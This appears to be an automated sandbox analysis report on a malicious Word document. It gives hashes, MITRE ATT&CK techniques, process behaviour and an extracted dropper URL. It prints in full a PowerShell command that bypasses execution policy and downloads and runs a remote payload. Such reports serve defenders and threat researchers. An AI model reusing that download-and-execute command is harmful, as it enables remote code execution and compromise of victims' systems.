5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2

General

Target

5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc
Size

34KB
MD5

5c2797ab79310c379e44ae2987dca9f3
SHA1

2fcc0edddc6274f89e03711ae40c8e5ef0bb47e9
SHA256

5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2
SHA512

6c31d93e8f3a22ce20ecfe3d6a0e2b1c72f9526b4c39a197dea6d47ffb282a00cb44768bdd57c57a2772af749d989564a4b6ec8b14f47d997a1e5cabee013a4c
SSDEEP

384:A3SiSwvxjk+tb/sWk+MlTT50jmtcgWFeFaJH:A3Vxw+tD7SXMgWFeFa9

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://192.168.166.158/payload.txt

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	2804	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2808 powershell.exe

pid	process
2808	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

WINWORD.EXE

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2416 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2808 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2808 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2416 WINWORD.EXE
2416 WINWORD.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE

pid	process
2416	WINWORD.EXE

pid	process
2808	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2808	powershell.exe

pid	process
2416	WINWORD.EXE
2416	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2416 wrote to memory of 2688	2416	WINWORD.EXE	splwow64.exe
PID 2416 wrote to memory of 2688	2416	WINWORD.EXE	splwow64.exe
PID 2416 wrote to memory of 2688	2416	WINWORD.EXE	splwow64.exe
PID 2416 wrote to memory of 2688	2416	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2416

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -exec bypass -nop -c IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.166.158/payload.txt'))
1⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2416-14-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2416-2-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

Filesize
44KB

Download
memory/2416-4-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-6-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-7-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-0-0x000000002FE21000-0x000000002FE22000-memory.dmp

Filesize
4KB

Download
memory/2416-13-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-5-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2416-22-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

Filesize
44KB

Download
memory/2416-23-0x00000000003F0000-0x00000000004F0000-memory.dmp

Filesize
1024KB

Download
memory/2808-20-0x000000001B840000-0x000000001BB22000-memory.dmp

Filesize
2.9MB

Download
memory/2808-21-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads